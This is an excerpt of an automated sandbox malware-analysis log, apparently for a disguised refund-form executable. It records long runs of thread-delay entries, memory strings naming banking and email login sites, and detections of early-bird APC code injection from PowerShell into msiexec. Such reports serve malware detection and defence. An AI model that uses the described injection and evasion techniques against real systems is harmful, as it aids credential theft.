          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599765Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599546Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599327Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599218Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598337Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598231Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597894Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597780Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597670Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597455Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597178Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597061Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596948Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596838Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596577Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596468Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596250Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596140Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595921Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595812Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595703Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595593Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595484Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595375Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595265Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595156Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595046Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594937Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594828Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594718Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594609Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594500Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594390Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594276Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594171Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8064Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1456Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6036Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -31359464925306218s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6524Thread sleep count: 6489 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -599765s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -599656s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6524Thread sleep count: 3354 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -599546s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -599437s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -599327s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -599218s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -599109s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -599000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -598890s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -598781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -598671s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -598562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -598453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -598337s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -598231s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -598125s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -598015s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -597894s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -597780s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -597670s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -597455s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -597178s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -597061s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -596948s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -596838s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -596687s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -596577s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -596468s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -596359s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -596250s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -596140s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -596031s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -595921s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -595812s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -595703s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -595593s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -595484s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -595375s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -595265s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -595156s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -595046s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -594937s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -594828s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -594718s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -594609s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -594500s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -594390s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -594276s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 4856Thread sleep time: -594171s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599765Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599546Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599327Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599218Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598337Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598231Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597894Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597780Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597670Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597455Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597178Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597061Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596948Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596838Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596577Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596468Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596250Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596140Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595921Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595812Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595703Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595593Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595484Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595375Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595265Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595156Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595046Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594937Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594828Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594718Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594609Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594500Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594390Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594276Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594171Jump to behavior
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
          Source: msiexec.exe, 0000000E.00000002.2530341209.00000000076BA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2530341209.000000000765A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
          Source: msiexec.exe, 0000000E.00000002.2543825754.0000000024453000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeAPI call chain: ExitProcess graph end nodegraph_0-3375
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeAPI call chain: ExitProcess graph end nodegraph_0-3378
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02A6D8B8 LdrInitializeThunk,2_2_02A6D8B8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Early bird code injection technique detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 40B0000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
